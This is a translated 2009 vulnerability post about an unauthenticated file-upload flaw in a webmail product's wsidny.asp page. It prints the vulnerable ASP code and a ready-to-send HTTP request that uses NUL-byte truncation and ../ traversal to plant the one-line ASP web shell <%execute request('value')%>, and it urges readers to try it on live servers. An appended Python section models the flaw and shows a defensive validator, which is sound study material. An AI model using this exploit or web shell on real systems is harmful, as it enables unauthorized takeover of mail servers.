Flower Horse mail-receiving box Getshell 0day - vulnerability warning - the Black Bar Safety Net

2009-10-31T00:00:00
ID MYHACK58:62200925153
Type myhack58
Reporter Anonymous
Modified 2009-10-31T00:00:00

Description

Fingerprint: login.asp shows the copyright notice, although some boxes have changed this address. The main directory also contains a wsidny.asp. The whole program filters input very strictly and looks like it was written by a professional, so the only place to start is this wsidny.asp. Look at the code:

    <!-- #include file="conn.asp" -->
    <%
    Server.ScriptTimeout = 36000
    PostSize = Request.TotalBytes
    if postsize=0 then
        response.End()
    end if
    BytesRead = 0
    ReadSize=256
    HeadSize=256
    ' The first 256 bytes of the raw body are used as the file name
    filename = Request.BinaryRead(ReadSize)
    BytesRead = BytesRead + ReadSize
    ' Everything after the first 256 bytes is the file content
    PostData = Request.BinaryRead(PostSize - BytesRead)
    StoreFile(filename)

    ' Convert the raw bytes to a gb2312 string
    Function Bytes2bStr(vin)
        if lenb(vin) =0 then
            Bytes2bStr = ""
            exit function
        end if
        Dim BytesStream,StringReturn
        set BytesStream = Server.CreateObject("ADODB.Stream")
        BytesStream.Type = 2
        BytesStream.Open
        BytesStream.WriteText vin
        BytesStream.Position = 0
        BytesStream.Charset = "gb2312"
        BytesStream.Position = 2
        StringReturn = BytesStream.ReadText
        BytesStream.close
        set BytesStream = Nothing
        Bytes2bStr = StringReturn
    End Function

    Function StoreFile(filename)
        filea=Bytes2bStr(filename)
        filea=LCase(filea)
        ' Extension check: anything not in the image list gets ".gif" appended
        if instr(filea,".")>0 then
            fileb=split(filea,".")
            num2=ubound(fileb)
            if instr("jpg|gif|jpeg|png|bmp",fileb(num2))>0 then
                filea=filea
            else
                filea=filea&".gif"
            end if
        else
            filea=filea&".gif"
        end if
        Path=server.MapPath(imgFolder&filea)
        Set oFileStream = CreateObject ("ADODB.Stream")
        oFileStream.Type = 1
        oFileStream.Mode = 3
        oFileStream.Open
        oFileStream.Write(PostData)
        oFileStream.SaveToFile Path,2
        oFileStream.Close
        Set oFileStream = Nothing
    End Function

    Response.Write PostSize
    Response.Write " bytes were read."
    %>

I don't understand what this page is used for; it may generate a picture of the broken key... At first I thought of constructing a form locally and submitting it directly, uploading a picture horse with a ";" in its name, but because the data is taken in with Request.BinaryRead, the URL-encoded parameters are not decoded.
So I switched to sending the request with VBS. Here there is another problem: the path is taken from the first 256 characters, which exceeds the maximum length that Server.MapPath supports, so I thought of truncating with \00. I captured the HTTP request sent by the VBS, wrote the truncation in with UE, and submitted it; with the include file removed, the test succeeded. With the include in place, however, it raises an error. This is because conn.asp, included at the top, in turn includes fsql.asp, an anti-injection page that checks request.form, and once request.form has been called you can no longer call Request.BinaryRead, otherwise it errors. So what is the point of this page? I was stuck here for a long time, then tried removing the HTTP header Content-Type: application/x-www-form-urlencoded and submitting, and the upload succeeded; only then did I realize how stupid I had been. With this header removed, IIS considers that no form-format parameters were submitted, so request.form receives no data and does not conflict with the later Request.BinaryRead.

The method of use is as follows:

    POST /DNFZONX/wsidny.asp HTTP/1.1
    Accept-Language: zh-cn
    Content-Length: 284
    Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-silverlight, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
    Host: xxx.fuck.com
    Connection: Keep-Alive

    a.asp aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<%execute request("value")%>

The part in front of the one-line code must be padded to 256 characters. Then, in UE, replace the spaces with \00, change the Host header and so on, submit with NC, and you will see the return "xxx bytes were read." On success, a.asp is in the target folder img/. If the image directory is not found or is not executable, you can use ../ to jump out of it; just make sure the part in front of the one-line code is exactly 256 characters. The local test was successful; try it when you encounter a box of envelopes or the like!
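
The extension check in StoreFile runs on the whole 256-byte field, while the file is written under whatever precedes the first \00, and the name may also contain ../. The following added example (not code from the original post or from the box program) models that mismatch in Python and shows a validator that checks the exact name that will reach the file system. The function names, the trailing-padding assumption, the latin-1 decoding in the model and the sample fields are constructed for illustration.

```python
import os
import re

NAME_FIELD = 256                                    # bytes the handler reads as the file name
ALLOWED_EXT = {"jpg", "jpeg", "gif", "png", "bmp"}  # same extensions as the page's check
SAFE_NAME = re.compile(r"[a-z0-9_-]{1,64}\.([a-z]{3,4})")

def legacy_name(field: bytes) -> str:
    """Model of the page's StoreFile: check the whole field, then let the
    file API cut the name at the first NUL (the behaviour the page reports)."""
    name = field.decode("latin-1").lower()
    ext = name.rsplit(".", 1)[-1]
    if "." not in name or ext not in "jpg|gif|jpeg|png|bmp":  # substring test
        name += ".gif"
    return name.split("\x00", 1)[0]

def safe_name(field: bytes) -> str:
    """Return a validated file name or raise ValueError."""
    if len(field) != NAME_FIELD:
        raise ValueError("name field must be exactly 256 bytes")
    raw = field.rstrip(b"\x00 ")          # assumption: padding is trailing NULs/spaces
    if any(b < 0x21 or b > 0x7E for b in raw):
        raise ValueError("NUL, control, space or non-ASCII byte inside name")
    m = SAFE_NAME.fullmatch(raw.decode("ascii").lower())
    if m is None or m.group(1) not in ALLOWED_EXT:
        raise ValueError("name is not <safe chars>.<allowed extension>")
    return m.group(0)

def store_path(img_root: str, body: bytes) -> str:
    """Split body into name field + data; return the path to write."""
    name = safe_name(body[:NAME_FIELD])
    root = os.path.realpath(img_root)
    path = os.path.realpath(os.path.join(root, name))
    if os.path.dirname(path) != root:     # defence in depth against traversal
        raise ValueError("path escapes the image folder")
    return path

# Constructed sample fields (not captured traffic).
TRUNCATED = b"a.asp\x00" + b"a" * 250     # shape of the name field in the page's request
PLAIN = b"photo_01.jpg".ljust(NAME_FIELD, b" ")

if __name__ == "__main__":
    print(repr(legacy_name(TRUNCATED)))   # name the legacy logic ends up writing
    for field in (TRUNCATED, PLAIN):
        try:
            print("accepted:", safe_name(field))
        except ValueError as err:
            print("rejected:", err)
```

Independently of the name check, a handler like this should not be reachable without authentication, and the image folder should not have script execution enabled.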